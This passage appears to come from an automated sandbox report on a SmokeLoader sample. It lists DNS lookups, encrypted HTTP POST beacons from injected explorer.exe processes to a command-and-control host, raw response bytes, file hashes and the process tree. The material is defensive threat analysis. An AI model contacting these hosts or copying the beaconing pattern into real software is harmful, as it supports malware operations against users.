            Nov 18, 2021 10:44:31.753774881 CET192.168.2.38.8.8.80x883dStandard query (0)rsuehfidvdkfvk.topA (IP address)IN (0x0001)
            Nov 18, 2021 10:44:32.049560070 CET192.168.2.38.8.8.80x7b89Standard query (0)iosoftware.orgA (IP address)IN (0x0001)
            Nov 18, 2021 10:44:49.812151909 CET192.168.2.38.8.8.80xbc17Standard query (0)rsuehfidvdkfvk.topA (IP address)IN (0x0001)
            Nov 18, 2021 10:44:50.679728985 CET192.168.2.38.8.8.80x96a8Standard query (0)iosoftware.orgA (IP address)IN (0x0001)
            Nov 18, 2021 10:45:15.733613968 CET192.168.2.38.8.8.80x1536Standard query (0)rsuehfidvdkfvk.topA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Nov 18, 2021 10:44:30.080061913 CET8.8.8.8192.168.2.30xeda6No error (0)rsuehfidvdkfvk.top5.188.88.118A (IP address)IN (0x0001)
            Nov 18, 2021 10:44:31.259133101 CET8.8.8.8192.168.2.30x3738No error (0)rsuehfidvdkfvk.top5.188.88.118A (IP address)IN (0x0001)
            Nov 18, 2021 10:44:31.775317907 CET8.8.8.8192.168.2.30x883dNo error (0)rsuehfidvdkfvk.top5.188.88.118A (IP address)IN (0x0001)
            Nov 18, 2021 10:44:32.075397015 CET8.8.8.8192.168.2.30x7b89No error (0)iosoftware.org139.60.161.75A (IP address)IN (0x0001)
            Nov 18, 2021 10:44:50.187908888 CET8.8.8.8192.168.2.30xbc17No error (0)rsuehfidvdkfvk.top5.188.88.118A (IP address)IN (0x0001)
            Nov 18, 2021 10:44:50.704993963 CET8.8.8.8192.168.2.30x96a8No error (0)iosoftware.org139.60.161.75A (IP address)IN (0x0001)
            Nov 18, 2021 10:45:15.753202915 CET8.8.8.8192.168.2.30x1536No error (0)rsuehfidvdkfvk.top5.188.88.118A (IP address)IN (0x0001)

            HTTP Request Dependency Graph

            • oidhj.com
              • rsuehfidvdkfvk.top
            • wjigjxv.com
            • mrirybsj.net
            • tmmykkqa.org

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.3497495.188.88.11880C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 18, 2021 10:44:30.158356905 CET1005OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://oidhj.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 338
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:30.514741898 CET1007INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:30 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 66 36 36 0d 0a 2c 01 00 00 0d ea ca f4 a9 bc c2 d2 42 81 8e 85 72 87 9b 58 60 8c d3 6c ea b8 55 27 e0 a1 b4 5e b6 34 5e b5 2b 44 fb 30 3b bc 67 5c ce fe b0 25 96 55 51 79 63 d7 60 70 55 2b e3 ef 22 79 35 f6 af 06 12 95 2f 9a 3d 93 4d 37 5a 42 f1 ab b5 95 90 bc f3 c3 36 8c 23 18 ba 54 73 c3 a9 20 6c 2f b2 93 54 fd bf db 73 3f 84 fb f5 e7 00 5e cd 13 22 cd 51 c2 19 3a c0 a2 1b 66 bc 39 14 d0 06 ed a7 6a 57 9d 82 73 7b 99 f4 a1 cf 5e 8d 37 3c bb 78 c7 58 00 b4 b7 52 a3 a1 4a 49 d1 4b 32 99 24 13 48 b6 ea ec 50 f3 a7 cc ce f2 57 ff 4b 29 f0 04 36 62 69 16 61 bb af 08 44 e6 69 bb 3c c3 ea f3 8c 5a 35 b2 fb 1a 3e 11 a4 de 25 42 ea 4b e6 60 89 13 26 de c6 22 17 42 32 ea 7b 8f 78 6e e5 2b ae 19 b3 76 5a 44 4f bb de 21 98 19 01 2f 49 a4 df 10 37 c1 f7 b6 b9 06 b8 50 96 3c 5c 81 9c 7b ee 15 3c f3 52 6c 24 12 fa e8 fe 72 b1 7f 94 17 ef 5d 66 a8 43 f3 b6 0c 51 0d 30 1b 6f a5 59 b4 d8 f8 d1 af 4b 7f f2 2d ad 31 aa eb 9e e5 cf 00 1e 71 06 00 b8 d3 34 d5 03 0f 06 00 0d 00 9c 03 00 00 c9 a6 6d fb 75 e6 cb 32 fd 66 8b 8e 41 26 0b 00 e5 c4 0d 6d 04 5e 5c e7 10 19 f4 25 09 91 e2 11 1d 20 4d 5a 26 d2 b8 dd 32 27 a3 25 c3 34 44 f1 af 41 59 5f 25 4d 9d 3c 3e 34 a2 81 d2 ca d1 51 64 d7 e5 5e 5e 84 51 60 e4 02 3b 29 c7 b1 b2 8f 87 03 6c 8f 65 32 08 3d c1 d2 8b 5b df 28 2c d3 f1 6c 90 9d e7 31 0d 81 8d ef f6 7d 15 a4 5a be 82 97 68 3b 5a 2c 32 cf 42 6b 9b 68 03 76 8b ce 62 87 63 a2 90 83 3d c1 c8 4a 9e d2 2b 50 82 9a 7a 43 69 8e 2d b6 35 4c 79 f6 f9 87 2e 92 c6 68 28 ad 22 17 5b 7a bc a2 04 1f 80 eb cd 89 67 b6 29 35 f2 db b0 f3 01 c1 5d 88 62 d6 3a 43 c4 ea 38 dd 76 40 32 7f 02 83 9d 3d ad c0 ec c8 af 83 82 42 e3 d5 7e 0f 5e 78 42 ff 89 eb 43 dc 87 39 c1 36 23 12 c7 42 2c 69 fc bf 45 d4 4c c2 12 09 5b 97 57 97 46 e3 49 da e1 0a c1 03 f1 ff 65 20 8d 3f 80 d7 45 b8 0f 83 ef 72 31 3a 85 33 e8 47 1e 4c 71 7b 8d db 39 e5 d8 86 94 2c 34 66 51 ad ca 8e ba 45 cd b5 7b f5 12 9b a0 da 2b ed 70 b9 69 f4 93 6d e6 c6 b1 44 d8 34 5e c2 e6 cb f4 e6 48 4f 8e 48 b8 66 56 c0 8a aa 26 e5 de 88 d1 77 10 49 9f 33 b5 35 d9 8d 63 2d c5 39 ea eb 6e c3 26 f9 01 ff 8c 29 4c 14 3e 59 82 64 63 17 bb 76 69 a9 27 3c 0b 0c c1 7b 0c f6 8f 76 b5 1f a3 90 4b 14 1e 92 34 24 7b fe 50 b8 45 c7 88 ff 2d 7e 60 f9 c4 c2 a6 4c 55 30 de 0e 46 76 50 8c 22 e3 5b 72 21 32 24 ee e3 34 65 ab 7c 3e 91 9c 3f 76 e5 77 3c 50 46 9f 59 46 e7 2d c3 cc 7e 32 6c e5 1d 70 61 c2 2b 7b 3c dd 0e c7 55 06 e7 4f 20 40 5a 4f dc 3d c9 23 e3 b0 e6 b7 76 fc 1c 76 46 c6 e8 12 a1 c2 98 ea 86 6e 16 8d b0 67 b5 80 af 65 61 61 5d 7b 82 7c 11 70 32 6d 59 af c0 d8 b6 14 e4 87 fe 1f 14 2d 1b 36 40 c9 53 d0 01 48 c0 c0 18 d0 d2 d4 40 ba a6 f0 e0 65 8a 35 00 fb 16 1c ea 16 43 ff ff da 9e a4 0e 39 cc 8f cc cf 3c 5b e8 e9 f2 7e 9a 1d 89 4e 09 a9 e7 77 b1 1c 33 e7 cc d4 55 79 09 b3 92 6a 6a 7b ef 8c 49 d0 ef 3e af 77 c2 29 c3 61 bf a8 77 6e 8b 9f c4 5a d4 ef 5b 16 ae 08 63 c3 62 4f ba 80 cd 6e f3 56 25 c0 f7 65 c1 94 5c 33 d8 3c e3 64 3c 17 9a 05 56 99 a2 71 ea af 4c cd 45 af 12 22 b8 7a 93 32 e0 07 d0 0e 68 36 7a 94 fb fd 54 f4 72 90 96 65 ad 67 d0 f1 65 30 23 05 d3 61 15 2f b7 a5 f3 65 a4 ae 56 12 8c c7 60 5a 4e 41 ea 2f 7c 0d ea 73 e7 88 2e 6c 56 5c 7a 79 7e 21 5b b9 99 23 a8 74 b2 d0 6e f9 51 92 c9 41 e9 b3 d3 a9 29 b0 7c ff ef b5 7c 8b de 40 a7 aa 05 4f 02 d5 04 f9 d3 60 a3 c6 7a 2f e1 5a 70 c5 3b 84 81 5e e6 83 f2 57 37 e0 19 b5 a8 fe ba cf 5e e4 b1 25 54 ec e5 5b 1a 0c 27 b2 84 9c 18 05 43 ff 6b ae d5 49 25 f3 d8 94 c3 33 9f 11 37 a6 c0 b2 42 70 b4 c7 5d de 69 a2 84 f9 c1 23 bc fa ee e5 e4 ae 9b 96
            Data Ascii: 1f66,BrX`lU'^4^+D0;g\%UQyc`pU+"y5/=M7ZB6#Ts l/Ts?^"Q:f9jWs{^7<xXRJIK2$HPWK)6biaDi<Z5>%BK`&"B2{xn+vZDO!/I7P<\{<Rl$r]fCQ0oYK-1q4mu2fA&m^\% MZ&2'%4DAY_%M<>4Qd^^Q`;)le2=[(,l1}Zh;Z,2Bkhvbc=J+PzCi-5Ly.h("[zg)5]b:C8v@2=B~^xBC96#B,iEL[WFIe ?Er1:3GLq{9,4fQE{+pimD4^HOHfV&wI35c-9n&)L>Ydcvi'<{vK4${PE-~`LU0FvP"[r!2$4e|>?vw<PFYF-~2lpa+{<UO @ZO=#vvFngeaa]{|p2mY-6@SH@e5C9<[~Nw3Uyjj{I>w)awnZ[cbOnV%e\3<d<VqLE"z2h6zTrege0#a/eV`ZNA/|s.lV\zy~![#tnQA)||@O`z/Zp;^W7^%T['CkI%37Bp]i#


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.3497505.188.88.11880C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 18, 2021 10:44:31.329138041 CET1445OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://wjigjxv.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 247
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:31.741991043 CET1446INHTTP/1.1 200 OK
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:31 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 0
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.3497515.188.88.11880C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 18, 2021 10:44:31.842526913 CET1447OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://mrirybsj.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 362
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:32.039333105 CET1447INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:31 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 43
            Connection: close
            Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 0c 2c 85 07 1f d1 2c 50 d3
            Data Ascii: gs'h],,P


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.3497895.188.88.11880C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 18, 2021 10:44:50.264198065 CET2299OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tmmykkqa.org/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 205
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:44:50.649455070 CET2301INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:44:50 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 46
            Connection: close
            Data Raw: 00 00 a5 82 9a e9 e7 a9 cb d5 14 c4 95 94 67 85 c2 1f 10 97 c9 73 e0 ad 1c 27 e0 bf bd 15 ad 68 5d fb 2c 30 82 06 0a 92 71 1e 98 ef c5 4a
            Data Ascii: gs'h],0qJ


            Session IDSource IPSource PortDestination IPDestination PortProcess
            4192.168.2.3498195.188.88.11880C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 18, 2021 10:45:15.836029053 CET8493OUTPOST / HTTP/1.1
            Cache-Control: no-cache
            Connection: Keep-Alive
            Pragma: no-cache
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://rsuehfidvdkfvk.top/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 423
            Host: rsuehfidvdkfvk.top
            Nov 18, 2021 10:45:16.057694912 CET8494INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 18 Nov 2021 09:45:16 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 406
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 73 75 65 68 66 69 64 76 64 6b 66 76 6b 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at rsuehfidvdkfvk.top Port 80</address></body></html>


            Code Manipulations

            Statistics

            Behavior

            Click to jump to process

            System Behavior

            Analysis Process: 1RMZ62tUAl.exe PID: 316 Parent PID: 760

            General

            Start time:10:43:42
            Start date:18/11/2021
            Path:C:\Users\user\Desktop\1RMZ62tUAl.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\1RMZ62tUAl.exe"
            Imagebase:0x400000
            File size:285184 bytes
            MD5 hash:8696A4269E30DDB34A7E0E84629EDE03
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.357733391.0000000002160000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.357762865.0000000002181000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            Analysis Process: explorer.exe PID: 3352 Parent PID: 316

            General

            Start time:10:43:55
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.345433901.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high

            Analysis Process: favdejf PID: 6992 Parent PID: 664

            General

            Start time:10:44:30
            Start date:18/11/2021
            Path:C:\Users\user\AppData\Roaming\favdejf
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\favdejf
            Imagebase:0x400000
            File size:285184 bytes
            MD5 hash:8696A4269E30DDB34A7E0E84629EDE03
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.424469148.0000000003C21000.00000004.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.424450951.0000000003C00000.00000004.00000001.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 56%, ReversingLabs
            Reputation:low

            Analysis Process: explorer.exe PID: 5732 Parent PID: 3352

            General

            Start time:10:45:11
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            Analysis Process: explorer.exe PID: 2892 Parent PID: 3352

            General

            Start time:10:45:13
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            Analysis Process: explorer.exe PID: 4424 Parent PID: 3352

            General

            Start time:10:45:15
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            Analysis Process: explorer.exe PID: 5056 Parent PID: 3352

            General

            Start time:10:45:18
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.555611191.0000000000111000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            Analysis Process: explorer.exe PID: 3532 Parent PID: 3352

            General

            Start time:10:45:20
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000017.00000002.555126531.0000000000311000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            Analysis Process: explorer.exe PID: 6052 Parent PID: 3352

            General

            Start time:10:45:22
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.559721619.00000000027D1000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            Analysis Process: explorer.exe PID: 6908 Parent PID: 3352

            General

            Start time:10:45:24
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.555346763.0000000000E91000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:high

            Analysis Process: explorer.exe PID: 4760 Parent PID: 3352

            General

            Start time:10:45:26
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high

            Analysis Process: explorer.exe PID: 6008 Parent PID: 3352

            General

            Start time:10:45:29
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Analysis Process: explorer.exe PID: 6528 Parent PID: 3352

            General

            Start time:10:45:32
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Analysis Process: explorer.exe PID: 6184 Parent PID: 3352

            General

            Start time:10:45:34
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Analysis Process: explorer.exe PID: 5824 Parent PID: 3352

            General

            Start time:10:45:36
            Start date:18/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\explorer.exe
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Analysis Process: explorer.exe PID: 6264 Parent PID: 3352

            General

            Start time:10:45:38
            Start date:18/11/2021
            Path:C:\Windows\SysWOW64\explorer.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\explorer.exe
            Imagebase:0x360000
            File size:3611360 bytes
            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Disassembly

            Code Analysis

            Reset < >